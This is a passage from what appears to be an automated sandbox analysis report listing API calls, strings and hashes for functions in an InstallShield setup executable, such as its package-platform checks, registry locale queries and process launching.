                                                                                                                                                                          • Instruction Fuzzy Hash: F5F19E30900258ADDF25EB60CC55BEEBB75AF15308F0441EEE1457B2D2CBB85E89CB66
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041A41C
• GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 0041A4A1
• GetModuleFileNameW.KERNEL32(00000000,00000400,?,00000400), ref: 0041A580
  • Part of subcall function 004357B3: __EH_prolog3_GS.LIBCMT ref: 004357BD
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last$AddressFileH_prolog3ModuleNameProc
• String ID: Could not find entry point in ISSetup.dll$HsG$HsG$ISSetup.dll$IsMsiHelper.cpp$Launching InstallScript engine: %s, %s, %d$RunISMSISetup$setup.exe$w$xuG
• API String ID: 1938318566-2889798997
• Opcode ID: 27f1c0b959f0f8e5a56c188dd01a99c7aae753f179adc9a13a2f568f3f56e12f
• Instruction ID: a000a53df8d3ca67d65d928d5410831d7b953353a9934217b74c1ec0e62e841d
• Opcode Fuzzy Hash: 27f1c0b959f0f8e5a56c188dd01a99c7aae753f179adc9a13a2f568f3f56e12f
• Instruction Fuzzy Hash: 33C18A70901218EEDB24DB64CD85BDDBBB0AF15304F1441EEE489A7292DBB85E84CF59
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentThread.KERNEL32 ref: 0045CD9D
• OpenThreadToken.ADVAPI32(00000000), ref: 0045CDA4
• GetLastError.KERNEL32 ref: 0045CDB4
• GetCurrentProcess.KERNEL32(00000008,?), ref: 0045CDC3
• OpenProcessToken.ADVAPI32(00000000), ref: 0045CDCA
• GetLastError.KERNEL32 ref: 0045CDD0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0045CE01
• GetLastError.KERNEL32 ref: 0045CE16
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 0045CE35
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000223,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0045CE5F
• EqualSid.ADVAPI32(00000004,?), ref: 0045CE7A
• FreeSid.ADVAPI32(?), ref: 0045CEA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Token$ErrorLast$CurrentInformationOpenProcessThread$AllocateEqualFreeInitialize
• String ID: +A
• API String ID: 884311744-2476349683
• Opcode ID: 95dc00f3ab7a107ad3b5007183d41f8750d13a454fb1fc3bb6a9622a3beecdd5
• Instruction ID: cbbb2327e60659be4cf1e07f3a107eeb60f4773822a979e15780b7e30f4710a0
• Opcode Fuzzy Hash: 95dc00f3ab7a107ad3b5007183d41f8750d13a454fb1fc3bb6a9622a3beecdd5
• Instruction Fuzzy Hash: 79419671900309AFDB109BA4DCC6BBFBBBDEF04345F10442AF901E2192D6399D498B68
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowRect.USER32 ref: 0041DB7E
• GetWindowRect.USER32 ref: 0041DB86
• GetSystemMetrics.USER32 ref: 0041DB90
• GetSystemMetrics.USER32 ref: 0041DB95
• SetRect.USER32 ref: 0041DBA0
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0041DBD6
• IsWindow.USER32(00000000), ref: 0041DBDF
• GetWindowRect.USER32 ref: 0041DBF5
• IntersectRect.USER32 ref: 0041DC03
• SubtractRect.USER32(?,?,?), ref: 0041DC1F
• SetWindowPos.USER32(00000000,?,?,0000001E,00000000,00000000,00000005,0000001E), ref: 0041DC5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: RectWindow$MetricsSystem$FindIntersectSubtract
• String ID: F$Shell_TrayWnd
• API String ID: 301737298-1447713892
• Opcode ID: 478bf9cd35f2a5fdc500c1e927996768de91ef4aed08e38c5fe28f229c8db9f2
• Instruction ID: 3c41205d294f757f3a50fd3c8671ab07fe2f87564d8069d4c880384eb5567a2f
• Opcode Fuzzy Hash: 478bf9cd35f2a5fdc500c1e927996768de91ef4aed08e38c5fe28f229c8db9f2
• Instruction Fuzzy Hash: 2C411D72900219AFDB10DFE9CE48ADFBBFDEB08300F110026E509B7150D674AA48CFA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045845A
• GetModuleHandleW.KERNEL32(kernel32.dll,CreateToolhelp32Snapshot,000002A8,00456B1E,0045932E,?,?,0000006C,0045932E,00457D82,?,?), ref: 00458472
• GetProcAddress.KERNEL32(00000000), ref: 00458475
• GetModuleHandleW.KERNEL32(Kernel32.dll,Process32First,?,0000006C,0045932E,00457D82,?,?), ref: 004584B0
• GetProcAddress.KERNEL32(00000000), ref: 004584B3
• GetModuleHandleW.KERNEL32(Kernel32.dll,Process32Next,?,0000006C,0045932E,00457D82,?,?), ref: 004584C9
• GetProcAddress.KERNEL32(00000000), ref: 004584CC
• _memset.LIBCMT ref: 004584F7
  • Part of subcall function 004585AD: __EH_prolog3_GS.LIBCMT ref: 004585B7
  • Part of subcall function 004585AD: GetModuleHandleW.KERNEL32(Ntdll.dll,NtQueryInformationProcess,?,00000400,?,000004A0,0045859B,00000000,?,0000006C,0045932E,00457D82,?,?), ref: 004585E7
  • Part of subcall function 004585AD: GetProcAddress.KERNEL32(00000000), ref: 004585EE
  • Part of subcall function 004585AD: OpenProcess.KERNEL32(00000400,00000000,?,?,0000006C,0045932E,00457D82,?,?), ref: 0045861A
  • Part of subcall function 004585AD: _memset.LIBCMT ref: 0045863F
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$H_prolog3__memset$OpenProcess
                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Kernel32.dll$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                          • API String ID: 2047754285-1872946363
                                                                                                                                                                          • Opcode ID: 60d086c9987231e0b04b777859cfd3aa07f65e33080c40890218160be6523061
                                                                                                                                                                          • Instruction ID: ca85f0838a772cda133f435dcfaa2189bd9894703b40dc35e129fb731601113c
                                                                                                                                                                          • Opcode Fuzzy Hash: 60d086c9987231e0b04b777859cfd3aa07f65e33080c40890218160be6523061
                                                                                                                                                                          • Instruction Fuzzy Hash: A931427190021CAFDB10EBA0CC89BDD76789F04745F5001AFF509B6182EF789B498F59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 004572EB
• GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 004572FB
• RegOpenKeyExW.ADVAPI32(80000003,.Default\Control Panel\desktop\ResourceLocale,00000000,000F003F,?,?,00000000), ref: 00457334
• RegQueryValueExW.ADVAPI32(?,00483E18,00000000,00000000,?,CJ), ref: 0045734C
• RegOpenKeyExW.ADVAPI32(80000003,.DEFAULT\Control Panel\International,00000000,000F003F,?), ref: 0045736D
• RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,?,CJ), ref: 00457387
• __wcstoi64.LIBCMT ref: 004573A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: OpenQueryValue$AddressHandleModuleProc__wcstoi64
• String ID: CJ$.DEFAULT\Control Panel\International$.Default\Control Panel\desktop\ResourceLocale$GetSystemDefaultUILanguage$Kernel32.dll$Locale
• API String ID: 2065448255-2963820800
• Opcode ID: e077b1d0d9a54c40e9d39e066671b9f74a15e5850532778cf3f665d039c01c16
• Instruction ID: a6cedd30fc32830db7be2498ca46c71cafdf6415e567ca57eccb9b5212ba0925
• Opcode Fuzzy Hash: e077b1d0d9a54c40e9d39e066671b9f74a15e5850532778cf3f665d039c01c16
• Instruction Fuzzy Hash: 14217671E0021EBEDB11EF91DD41EBF77ACEB04B56F10043BAD05B2142DA649E49D7A8
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004217C8: _memset.LIBCMT ref: 00421801
• SendMessageW.USER32(?,00000401,00000000,00000001), ref: 00421CE4
• _memset.LIBCMT ref: 00421D0E
• _memset.LIBCMT ref: 00421D25
  • Part of subcall function 0043FBF3: __EH_prolog3_GS.LIBCMT ref: 0043FBFD
  • Part of subcall function 0043FBF3: wsprintfW.USER32 ref: 0043FC3F
  • Part of subcall function 0043FBF3: wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0041F4B2: __EH_prolog3_GS.LIBCMT ref: 0041F4B9
  • Part of subcall function 0041F4B2: __itow_s.LIBCMT ref: 0041F4F0
  • Part of subcall function 0041F4B2: SetLastError.KERNEL32(00000006,?,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F51F
  • Part of subcall function 0041F533: __EH_prolog3_GS.LIBCMT ref: 0041F53A
  • Part of subcall function 0041F533: __ltow_s.LIBCMT ref: 0041F572
  • Part of subcall function 0041F533: SetLastError.KERNEL32(00000008,00000000,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F5A1
  • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
• _memset.LIBCMT ref: 004221A7
• lstrcmpW.KERNEL32(?,00483E18,?,?), ref: 004221E0
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00422270
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last_memset$FreeMessageSendString$__itow_s__ltow_slstrcmpwsprintfwvsprintf
• String ID: DownloadFiles: %s$DownloadFiles: downloading %s$HsG$^$msiaction.cpp$y
• API String ID: 1474050675-2082572780
• Opcode ID: 8960c283118b1bec289015494a74c56f957b5b89015b83932b1b8d3e9897acfc
• Instruction ID: 5a5d13f6fdca0b8dab8671759087043df62c84359e7ddb997fc172de202d3d76
• Opcode Fuzzy Hash: 8960c283118b1bec289015494a74c56f957b5b89015b83932b1b8d3e9897acfc
• Instruction Fuzzy Hash: 60028E70A00228EFDB20EB65CD95BDDB7F4AF15304F5040EAE109A7191EB789B89CF65
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0042DF20
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_String
• String ID: %s%d$.$HsG$InstanceId$Instances$PackageCode$ProductCode$ProductVersion$UpgradeCode$count$key
• API String ID: 2608676048-2845829733
• Opcode ID: a207a2c3fd5d68b72fb71a447eb78f2770c8b81ca98f9c14f0f6b156345f7440
• Instruction ID: a3e08cd0b1a813b0d29dd8cc2e065337fc68d5d39633514d4d2796418e8dbc85
• Opcode Fuzzy Hash: a207a2c3fd5d68b72fb71a447eb78f2770c8b81ca98f9c14f0f6b156345f7440
• Instruction Fuzzy Hash: 3FF15971900229EADB14DBA1CC55BEDB778AF14308F5041EEE009B71D2EBB85B88CF95
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: AMD64$Checking package platform...$HsG$Intel64$Package is 32-bit$Package is 64-bit$Status returned from summary info: %d$Status returned obtaining PID_TEMPLATE property: %d$Template summary for current package: %s$msiaction.cpp$x64
                                                                                                                                                                          • API String ID: 2427045233-1482138839
                                                                                                                                                                          • Opcode ID: 8cd7c5742e3e27ef107730f7b0328c552dc376fc6e9e0a8f881b51b00c0bf63f
                                                                                                                                                                          • Instruction ID: b86fc842712ed1d66245e91ac34bd0663482a0b1c39bf07b98a38b607eda857d
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cd7c5742e3e27ef107730f7b0328c552dc376fc6e9e0a8f881b51b00c0bf63f
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EE14F71900268EEEB21DBA4CC45BDDBBB8AF11304F5441EBE109B61D1D7B85E88CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcscmp.LIBCMT ref: 0040CCD2
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104), ref: 0040CD6A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName_wcscmp
                                                                                                                                                                          • String ID: Files$Folders$HsG$HsG$NO_KEY_VALUE$_ISMSIDEL.INI
                                                                                                                                                                          • API String ID: 1193818139-1053003534
                                                                                                                                                                          • Opcode ID: cee0d852799ef47b46240a3989a62840b3f515119edbeba35c07b458c3eee0b8
                                                                                                                                                                          • Instruction ID: 7fb2dc1470dd83984b052697f8f68d2a86cbf5bc731933dc406f754ab513c14c
                                                                                                                                                                          • Opcode Fuzzy Hash: cee0d852799ef47b46240a3989a62840b3f515119edbeba35c07b458c3eee0b8
                                                                                                                                                                          • Instruction Fuzzy Hash: E5C15271900358EADB21EB51CC49BDEB7B8BB10308F1445EBE549B31C2DB785B89CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00457A93
                                                                                                                                                                          • _memset.LIBCMT ref: 00457B2C
                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 00457BA4
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00457BBF
                                                                                                                                                                          • _memset.LIBCMT ref: 00457C1F
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457CEE
                                                                                                                                                                          • WaitForInputIdle.USER32 ref: 00457D69
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00457D8D
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00457D97
                                                                                                                                                                            • Part of subcall function 0041D880: __EH_prolog3_GS.LIBCMT ref: 0041D88A
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 0041B2AF: __EH_prolog3_GS.LIBCMT ref: 0041B2B6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$FreeProcessString_memset$CodeCreateExecuteExitIdleInputShellWait
                                                                                                                                                                          • String ID: <$D$HsG
                                                                                                                                                                          • API String ID: 3263116737-2123543526
                                                                                                                                                                          • Opcode ID: ccea890404a5b2dc674fa3aa8cbfa9ebfe07e6f56a9a629094fdfbd4a711a2b1
                                                                                                                                                                          • Instruction ID: e99105c32301c2b9f9e72ad1d92787400854d41ea33f21c08c76ee520aa9e478
                                                                                                                                                                          • Opcode Fuzzy Hash: ccea890404a5b2dc674fa3aa8cbfa9ebfe07e6f56a9a629094fdfbd4a711a2b1
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FA1B571800248EEDB20EFA5CC45FDE7B78AF55304F04416EFD0AA7292DB785A49CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402735
                                                                                                                                                                          • SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402795
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004027BE
                                                                                                                                                                          • SetLastError.KERNEL32(?,00000000,00000000,000000FF), ref: 0040281E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040283E
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 0040288A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402899
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004028B3
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004028C0
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004028E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-815662401
                                                                                                                                                                          • Opcode ID: 71cd8f9d2933eca90edd387c86763be0810450cee94afa3b6677b495f4f40b84
                                                                                                                                                                          • Instruction ID: cdbf6a085d593452c2e731b6caff73d97af445c8ed884316c6e615f2f30cdbe4
                                                                                                                                                                          • Opcode Fuzzy Hash: 71cd8f9d2933eca90edd387c86763be0810450cee94afa3b6677b495f4f40b84
                                                                                                                                                                          • Instruction Fuzzy Hash: A1512B715087409FD310DF29C948B5BBBF4FF89318F104A2EE999976A1D779E804CB8A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043CEAF
                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?,00000424,0043D124), ref: 0043CEC1
                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0043CEE4
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0043CEF4
                                                                                                                                                                          • GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 0043CF09
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000408), ref: 0043CF18
                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 0043CF28
                                                                                                                                                                          • GetSystemPaletteEntries.GDI32(?,00000000,0000000A,00000004), ref: 0043CFC3
                                                                                                                                                                          • GetSystemPaletteEntries.GDI32(?,000000F6,0000000A,000003DC), ref: 0043CFD4
                                                                                                                                                                          • CreatePalette.GDI32(00000000), ref: 0043CFD7
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0043CFE3
• GetDC.USER32(00000000), ref: 0043CFFA
• CreateHalftonePalette.GDI32(00000000), ref: 0043D003
• ReleaseDC.USER32 ref: 0043D010
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
